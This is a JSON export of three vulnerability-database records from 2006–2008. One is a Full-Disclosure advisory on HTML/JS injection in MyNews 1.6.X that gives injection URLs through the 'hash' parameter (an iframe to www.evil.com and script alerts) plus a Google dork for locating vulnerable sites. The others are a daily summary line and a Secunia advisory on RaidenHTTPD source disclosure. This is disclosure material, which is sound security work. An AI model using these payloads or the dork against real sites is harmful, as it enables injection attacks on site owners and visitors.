{"securityvulns": [{"lastseen": "2018-08-31T11:10:24", "bulletinFamily": "software", "description": "I know it's basic, but I am a supporter of FD and therefore \r\nplanetluc.com has to be\r\nblamed now! I checked their script MyNews in version 1.6.4 today and \r\nthen some\r\nother versions, all are vulnerable to HTML and JS injection.\r\n\r\n--- ADVISORY ---\r\n\r\n----------------------------\r\n|| WWW.SMASH-THE-STACK.NET ||\r\n-----------------------------\r\n\r\n|| ADVISORY: MyNews 1.6.X HTML/JS Injection Vulnerability\r\n\r\n_____________________\r\n|| 0x00: ABOUT ME\r\n|| 0x01: DATELINE\r\n|| 0x02: INFORMATION\r\n|| 0x03: EXPLOITATION\r\n|| 0x04: GOOGLE DORK\r\n|| 0x05: RISK LEVEL\r\n____________________________________________________________\r\n____________________________________________________________\r\n\r\n_________________\r\n|| 0x00: ABOUT ME\r\n\r\nAuthor: SkyOut\r\nDate: February 2008\r\nContact: skyout[-at-]smash-the-stack[-dot-]net\r\nWebsite: http://www.smash-the-stack.net/\r\n\r\n_________________\r\n|| 0x01: DATELINE\r\n\r\n2008-02-06: Bug found\r\n2008-02-06: Advisory released\r\n\r\n____________________\r\n|| 0x02: INFORMATION\r\n\r\nThe MyNews script by planetluc.com in all versions of the 1.6.X tree is\r\nvulnerable to HTML and JS injection due to no sanitation of the "hash"\r\nvalue in combination with the action "admin".\r\n\r\n_____________________\r\n|| 0x03: EXPLOITATION\r\n\r\nNo exploit is needed to test this vulnerability. You just need a working\r\nweb browser.\r\n\r\n1: HTML Injection\r\n\r\nTo make an HTML injection, visit the website's main page. The name \r\nmight differ\r\nfrom the original name "mynews.inc.php", mostly it's called \r\n"index.php". Now\r\nconstruct a malformed URL as follows:\r\n\r\nhttp://www.example.com/index.php?hash="><iframe src=http:// \r\nwww.evil.com/ height=500px width=500px></iframe><!--&do=admin\r\n\r\nOf course you can manipulate the values of "height" and "width" like you\r\nwant to. 
Do it the way it best fits to your needs!\r\n\r\n2: JavaScript Injection\r\n\r\nJS injection is similar to HTML injection, just that you put a JS code\r\nin the "hash" parameter. Let me show you two examples:\r\n\r\nhttp://www.example.com/index.php?hash="><script>alert(1337);</ \r\nscript><!--&do=admin\r\n\r\nor\r\n\r\nhttp://www.example.com/index.php?hash="><script>alert("XSS");</ \r\nscript><!--&do=admin\r\n\r\nSometimes using strings doesn't work, so test it first!\r\n\r\n____________________\r\n|| 0x04: GOOGLE DORK\r\n\r\nintext:"powered by MyNews 1.6.*"\r\n\r\n___________________\r\n|| 0x05: RISK LEVEL\r\n\r\n- LOW - (1/3) -\r\n\r\n<!> Happy Hacking <!>\r\n\r\n____________________________________________________________\r\n____________________________________________________________\r\n\r\nTHE END\r\n\r\n--- ADVISORY ---\r\n\r\nSincerely,\r\nSkyOut\r\n\r\n_______________________________________________\r\nFull-Disclosure - We believe in it.\r\nCharter: http://lists.grok.org.uk/full-disclosure-charter.html\r\nHosted and sponsored by Secunia - http://secunia.com/", "modified": "2008-02-07T00:00:00", "published": "2008-02-07T00:00:00", "id": "SECURITYVULNS:DOC:19032", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:19032", "title": "[Full-disclosure] MyNews 1.6.X HTML/JS Injection Vulnerability", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-08-31T11:09:28", "bulletinFamily": "software", "description": "PHP inclusions, SQL injections, directory traversals, cross-site scripting, information leaks, etc.", "modified": "2008-02-07T00:00:00", "published": "2008-02-07T00:00:00", "id": "SECURITYVULNS:VULN:8646", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:8646", "title": "Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-08-31T11:10:16", "bulletinFamily": "software", "description": 
"\r\nTITLE:\r\nRaidenHTTPD Script Source Disclosure Vulnerability\r\n\r\nSECUNIA ADVISORY ID:\r\nSA19032\r\n\r\nVERIFY ADVISORY:\r\nhttp://secunia.com/advisories/19032/\r\n\r\nCRITICAL:\r\nModerately critical\r\n\r\nIMPACT:\r\nExposure of sensitive information\r\n\r\nWHERE:\r\n>From remote\r\n\r\nSOFTWARE:\r\nRaidenHTTPD 1.x\r\nhttp://secunia.com/product/4614/\r\n\r\nDESCRIPTION:\r\nSecunia Research has discovered a vulnerability in RaidenHTTPD, which\r\ncan be exploited by malicious people to disclose potentially sensitive\r\ninformation.\r\n\r\nThe vulnerability is caused due to a validation error of the filename\r\nextension supplied by the user in the URL. This can be exploited to\r\nretrieve the source code of script files (e.g. PHP) from the server\r\nvia specially crafted requests containing dot, space and slash\r\ncharacters.\r\n\r\nThe vulnerability has been confirmed in version 1.1.47. Prior\r\nversions may also be affected.\r\n\r\nSOLUTION:\r\nUpdate to version 1.1.48.\r\nhttp://www.raidenhttpd.com/en/download.html\r\n\r\nPROVIDED AND/OR DISCOVERED BY:\r\nTan Chew Keong, Secunia Research\r\n\r\nORIGINAL ADVISORY:\r\nSecunia Research:\r\nhttp://secunia.com/secunia_research/2006-15/\r\n\r\n----------------------------------------------------------------------\r\n\r\nAbout:\r\nThis Advisory was delivered by Secunia as a free service to help\r\neverybody keeping their systems up to date against the latest\r\nvulnerabilities.\r\n\r\nSubscribe:\r\nhttp://secunia.com/secunia_security_advisories/\r\n\r\nDefinitions: (Criticality, Where etc.)\r\nhttp://secunia.com/about_secunia_advisories/\r\n\r\n\r\nPlease Note:\r\nSecunia recommends that you verify all advisories you receive by\r\nclicking the link.\r\nSecunia NEVER sends attached files with advisories.\r\nSecunia does not advise people to install third party patches, only\r\nuse those supplied by the vendor.\r\n", "modified": "2006-03-03T00:00:00", "published": "2006-03-03T00:00:00", "id": 
"SECURITYVULNS:DOC:11688", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:11688", "title": "[SA19032] RaidenHTTPD Script Source Disclosure Vulnerability", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}]}